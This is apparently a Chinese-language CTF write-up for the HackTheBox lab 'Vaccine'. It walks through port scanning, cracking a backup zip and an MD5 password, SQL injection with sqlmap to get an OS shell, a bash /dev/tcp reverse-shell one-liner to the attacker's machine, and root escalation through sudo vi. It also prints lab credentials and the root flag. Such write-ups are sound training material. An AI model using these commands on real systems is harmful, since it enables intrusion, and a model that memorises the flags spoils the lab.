0x01端口扫描

使用

nmap -sV -sS 10.10.10.46

执行端口扫描，并且显示版本信息和端口服务

发现目标主机开放了21端口FTP服务、22端口SSH服务、80端口web服务。

我们可以优先通过FTP服务登录，然后可以对web服务提供渗透线索，因为登录的凭据是上一个靶场Oopsie获取到的，用于下一个靶场的使用（疏忽忘记写了）：在/root/.config/filezilla路径下的filezilla.xml配置文件，用户登录凭据是：ftpuser/mc@F1l3ZilL4

我们使用ls查看当前目录下的文件，发现存在backup.zip这个类似备份的zip文件，我们get下来，解压后发现需要解压密码

可以使用kali的john，也可以在win下使用archpr去爆破压缩包密码。

爆破出压缩包解压密码为741852963，然后输入压缩包密码解压，发现有两个文件：index.php和style.css文件，打开index.php

通过代码审计可以知道，里面有一个web登录的凭证，用户名admin，密码2cb42f8734ea607eefed3b70af13bbd3是经过MD5算法进行加密，这时候可以使用在线的解密网站somd5解密，明文密码是：qwerty789

0x02 WEB渗透

浏览器访问10.10.10.46

使用账号：admin,密码qwerty789登录后台，发现有个搜索框

我们随便输入一个1,搜索

然后发现url是search=1，很快想到可以测试是否存在SQL注入漏洞

使用’ or 1=1 #有返回报错，可以试试使用sqlmap去注入。

在搜索框随便写内容，然后点击搜索时候使用burp抓包，右键保存文件为sql.txt

然后使用sql.txt去跑sqlmap

发现确实存在SQL注入漏洞，且数据库为postgresql数据库，我们继续使用-os—shell获取到shell

发现shell获取成功，使用whoami查看当前用户名

当前用户名是postgres，然后我们使用bash -c 反弹shell到kali

输入：

bash -c 'bash -i >& /dev/tcp/10.10.16.9/1234 0>&1'

其中10.10.16.9是自己的kali的IP，1234是反弹的端口（随意写）。然后监听1234端口

然后成功反弹shell，切换到当前用户根目录，ls查看，本身应该有个user.txt的。感觉靶场有问题，所以不予理会。

0x03提升权限

在var/www/html/路径下，发现有个dashboard.php文件，cat一下试试

通过代码审计可知有个数据库连接配置，显示用户名是postgres，密码是P@s5w0rd!

我们现在需要把shell升级为TTY， tty命令用于显示终端机连接标准输入设备的文件名称

SHELL=/bin/bash script -q /dev/null

使用sudo -l查看自己当前的权限

发现最下面有个用户可以使用VI编辑/etc/postgresql/11/main/pg_hba.conf配置文件，利用它来获得一个根shell并访问root.txt。

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

进入vi之后打字会重叠，所以直接输入:!/bin/bash就可以了

进入/root目录下，查看root.txt可以获得root的flag：

dd6e058e814260bc70e9bbdef2715849